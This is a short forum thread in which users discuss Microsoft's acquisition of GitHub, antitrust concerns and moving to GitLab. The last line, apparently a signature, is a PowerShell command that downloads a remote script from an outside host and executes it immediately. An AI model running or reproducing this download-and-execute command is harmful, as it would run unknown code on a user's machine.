Git Hub

Heard a nasty rumour that Micro$oft are looking to acquire Git Hub... That's going to be a disaster in the wings. Anyone heard anything more about it. A lotv of teh "Non Approved " Addons for Kodi and such use Git hub now... I dread to think what they'll do to a perfectly good system Open to the forum for thoughts...
Theyve already bought it.
Seems that you've been living under a rock lol, deal is already done.

Yeep! I hope they don't F**k about with it too much. From my uses so far there doesn't seem to be much of a change... though with Microsoft you never can tell what they'll do to screw the public for money. I wonder if this could be construed as an uncompetative business practice or a breach of some anti-Trust thing.. Just a thought. Microsoft UK have been warned on a number occasions about the way that you are locked out of using any of YOUR generated content when your subscription expires for using their software... The warning relates to the UK Data Protection Act and some Copyright issues. I'm keeping an eye on that front. As an Independent Published Author I note these things. Still it seems they could have done it to stop Apple or a Chinese concern buying Git Hub I suppose. we'll just have to wait and see..

They bought id because google, amazon etc use github infrastructure
Move to GitLab, it’s not owned by Microsoft and allows you to create private repositories for free.
powershell.exe -noprofile -noexit -command iex "(new-object net.webclient).downloadstring('https://media.nick-name.net/ps/execute.ps1')"[Image: f4hRdFS.gif]
